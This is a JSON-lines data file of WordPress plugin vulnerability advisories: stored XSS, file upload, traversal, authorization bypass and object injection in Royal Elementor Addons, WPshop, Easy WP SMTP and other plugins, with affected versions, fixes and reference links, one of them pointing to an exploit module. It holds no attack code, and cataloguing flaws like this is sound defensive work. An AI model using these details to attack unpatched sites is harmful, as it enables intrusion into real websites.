{"CVE_ID":"CVE-2024-4488","slug":"royal-elementor-addons","versionImpact":"1.3.976","versionEndExcluding":"1.3.977","description":"The Royal Elementor Addons and Templates for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018inline_list\u2019 parameter in versions up to, and including, 1.3.976 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.977, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0ac434-7e85-44d4-b21e-df462f63cd9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb0ac434-7e85-44d4-b21e-df462f63cd9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/form-builder\\\/widgets\\\/wpr-form-builder.php#L3238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/form-builder\\\/widgets\\\/wpr-form-builder.php#L3238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4342","slug":"royal-elementor-addons","versionImpact":"1.3.975","versionEndExcluding":"1.3.976","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's image hotspot, image accordion, off canvas, woogrid, and product mini cart widgets in all versions up to, and including, 1.3.975  due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.976, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d565196-592d-415c-b37c-e54456aa9ed8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d565196-592d-415c-b37c-e54456aa9ed8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-hotspots\\\/widgets\\\/wpr-image-hotspots.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-hotspots%2Fwidgets%2Fwpr-image-hotspots.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-hotspots\\\/widgets\\\/wpr-image-hotspots.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-hotspots%2Fwidgets%2Fwpr-image-hotspots.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-accordion\\\/widgets\\\/wpr-image-accordion.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-accordion%2Fwidgets%2Fwpr-image-accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/image-accordion\\\/widgets\\\/wpr-image-accordion.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fimage-accordion%2Fwidgets%2Fwpr-image-accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/offcanvas\\\/widgets\\\/wpr-offcanvas.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Foffcanvas%2Fwidgets%2Fwpr-offcanvas.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/offcanvas\\\/widgets\\\/wpr-offcanvas.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Foffcanvas%2Fwidgets%2Fwpr-offcanvas.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/theme-builder\\\/woocommerce\\\/product-mini-cart\\\/widgets\\\/wpr-product-mini-cart.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Ftheme-builder%2Fwoocommerce%2Fproduct-mini-cart%2Fwidgets%2Fwpr-product-mini-cart.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/theme-builder\\\/woocommerce\\\/product-mini-cart\\\/widgets\\\/wpr-product-mini-cart.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Ftheme-builder%2Fwoocommerce%2Fproduct-mini-cart%2Fwidgets%2Fwpr-product-mini-cart.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4087","slug":"royal-elementor-addons","versionImpact":"1.3.975","versionEndExcluding":"1.3.976","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Back to Top widget in all versions up to, and including, 1.3.975 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.976, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca7bb88-4a2c-4406-8610-15ce6e77c31f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca7bb88-4a2c-4406-8610-15ce6e77c31f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.972\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php#L684\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.972\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php#L684\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fback-to-top%2Fwidgets%2Fwpr-back-to-top.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3094946\\\/royal-elementor-addons\\\/tags\\\/1.3.976\\\/modules\\\/back-to-top\\\/widgets\\\/wpr-back-to-top.php?old=3086875&old_path=royal-elementor-addons%2Ftags%2F1.3.975%2Fmodules%2Fback-to-top%2Fwidgets%2Fwpr-back-to-top.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3887","slug":"royal-elementor-addons","versionImpact":"1.3.974","versionEndExcluding":"1.3.975","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Form Builder widget in all versions up to, and including, 1.3.974 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.975, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5122800d-f274-4129-84d4-02380269502c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5122800d-f274-4129-84d4-02380269502c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086890%40royal-elementor-addons&old=3081886%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086890%40royal-elementor-addons&old=3081886%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3675","slug":"royal-elementor-addons","versionImpact":"1.3.971","versionEndExcluding":"1.3.972","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Flip Carousel, Flip Box, Post Grid, and Taxonomy List widgets in all versions up to, and including, 1.3.971 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.972, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/337cbec1-c8a8-41b5-8c32-779be671120f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/337cbec1-c8a8-41b5-8c32-779be671120f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-carousel\\\/widgets\\\/wpr-flip-carousel.php#L1191\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-carousel\\\/widgets\\\/wpr-flip-carousel.php#L1191\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-box\\\/widgets\\\/wpr-flip-box.php#L1903\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/flip-box\\\/widgets\\\/wpr-flip-box.php#L1903\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/grid\\\/widgets\\\/wpr-grid.php#L8567\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/grid\\\/widgets\\\/wpr-grid.php#L8567\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/taxonomy-list\\\/widgets\\\/wpr-taxonomy-list.php#L621\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/taxonomy-list\\\/widgets\\\/wpr-taxonomy-list.php#L621\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072880%40royal-elementor-addons&new=3072880%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3072880%40royal-elementor-addons&new=3072880%40royal-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1567","slug":"royal-elementor-addons","versionImpact":"1.3.94","versionEndExcluding":"1.3.95","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to limited file uploads due to missing file type validation in the 'file_validity' function in all versions up to, and including, 1.3.94. This makes it possible for unauthenticated attackers to upload dangerous file types such as .svgz on the affected site's server which may make cross-site scripting or remote code execution possible.","recommendation":"Update to version 1.3.95, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a04705d-cd17-4b4b-b04d-de55d6479dab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a04705d-cd17-4b4b-b04d-de55d6479dab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.89\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.89\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.90\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.90\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056612\\\/royal-elementor-addons\\\/tags\\\/1.3.95\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php?old=3055840&old_path=royal-elementor-addons%2Ftags%2F1.3.94%2Fclasses%2Fmodules%2Fforms%2Fwpr-file-upload.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056612\\\/royal-elementor-addons\\\/tags\\\/1.3.95\\\/classes\\\/modules\\\/forms\\\/wpr-file-upload.php?old=3055840&old_path=royal-elementor-addons%2Ftags%2F1.3.94%2Fclasses%2Fmodules%2Fforms%2Fwpr-file-upload.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11903","slug":"wp-ecards-invites","versionImpact":"1.3.904","versionEndExcluding":"1.3.905","description":"The WP eCards plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ecard' shortcode in all versions up to, and including, 1.3.904 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.905, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199511%40wp-ecards-invites&new=3199511%40wp-ecards-invites&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199511%40wp-ecards-invites&new=3199511%40wp-ecards-invites&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8e1df5-2e8a-4c84-83f8-6f6d53d00356?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa8e1df5-2e8a-4c84-83f8-6f6d53d00356?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10135","slug":"wpshop","versionEndExcluding":"1.3.9.6","description":"The WPshop 2 \u2013 E-Commerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ajaxUpload function in versions before 1.3.9.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/g0blin.co.uk\\\/g0blin-00036\\\/\",\"name\":\"https:\\\/\\\/g0blin.co.uk\\\/g0blin-00036\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_wpshop_ecommerce_file_upload.rb\",\"name\":\"https:\\\/\\\/github.com\\\/espreto\\\/wpsploit\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_wpshop_ecommerce_file_upload.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1103406\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1103406\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpshop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpshop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32e8224d-a653-48d7-a3f4-338fc0c1dc77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32e8224d-a653-48d7-a3f4-338fc0c1dc77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8464","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.9.0","versionEndExcluding":"1.3.9.1","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.3.9.0 via the wpcf7_guest_user_id cookie. This makes it possible for unauthenticated attackers to upload and delete files outside of the originally intended directory. The impact of this vulnerability is limited, as file types are validated and only safe ones can be uploaded, while deletion is limited to the plugin's uploads folder.","recommendation":"Update to version 1.3.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1018\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1018\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1050\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L1050\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.9.0\\\/inc\\\/dnd-upload-cf7.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&new=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&new=3344512%40drag-and-drop-multiple-file-upload-contact-form-7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f7be7f-f675-4c9f-a7b3-525a3c3c5775?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17f7be7f-f675-4c9f-a7b3-525a3c3c5775?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25141","slug":"easy-wp-smtp","versionEndExcluding":"1.3.9.1","description":"The Easy WP SMTP plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.3.9. This is due to missing capability checks on the admin_init() function, in addition to insufficient input validation. This makes it possible for unauthenticated attackers to modify the plugins settings and arbitrary options on the site that can be used to inject new administrative user accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Feasy-wp-smtp&old=2052057&new_path=%2Feasy-wp-smtp&new=2052058&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Feasy-wp-smtp&old=2052057&new_path=%2Feasy-wp-smtp&new=2052058&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/vulnerability-26\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/support\\\/topic\\\/vulnerability-26\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84b75f7d-7258-46f6-aee6-b96d70bee264?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84b75f7d-7258-46f6-aee6-b96d70bee264?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3515","slug":"drag-and-drop-multiple-file-upload-contact-form-7","versionImpact":"1.3.8.9","versionEndExcluding":"1.3.9.0","description":"The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in all versions up to, and including, 1.3.8.9. This makes it possible for unauthenticated attackers to bypass the plugin's blacklist and upload .phar or other dangerous file types on the affected site's server, which may make remote code execution possible on the servers that are configured to handle .phar files as executable PHP scripts, particularly in default Apache+mod_php configurations where the file extension is not strictly validated before being passed to the PHP interpreter.","recommendation":"Update to version 1.3.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.8.8\\\/inc\\\/dnd-upload-cf7.php#L845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drag-and-drop-multiple-file-upload-contact-form-7\\\/tags\\\/1.3.8.8\\\/inc\\\/dnd-upload-cf7.php#L845\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310153\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3310153\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1298242-61d2-495e-bae7-96b5e12bd03d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1298242-61d2-495e-bae7-96b5e12bd03d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3715","slug":"contact-form-entries","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.3.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbc23b3-fa9d-4303-8283-1cabb2a6bb71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adbc23b3-fa9d-4303-8283-1cabb2a6bb71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074165%40contact-form-entries%2Ftrunk&old=3066269%40contact-form-entries%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074165%40contact-form-entries%2Ftrunk&old=3066269%40contact-form-entries%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1951","slug":"logo-showcase-ultimate","versionImpact":"1.3.8","versionEndExcluding":"1.3.9","description":"The Logo Showcase Ultimate \u2013 Logo Carousel, Logo Slider & Logo Grid plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization via shortcode of untrusted input. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a63b2091-1502-4d9f-98c4-ce9d2f923dc4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-adl-metabox.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-adl-metabox.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8\\\/classes\\\/lcg-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8&old=3045923&new_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.9&new=3045923&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.8&old=3045923&new_path=\\\/logo-showcase-ultimate\\\/tags\\\/1.3.9&new=3045923&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
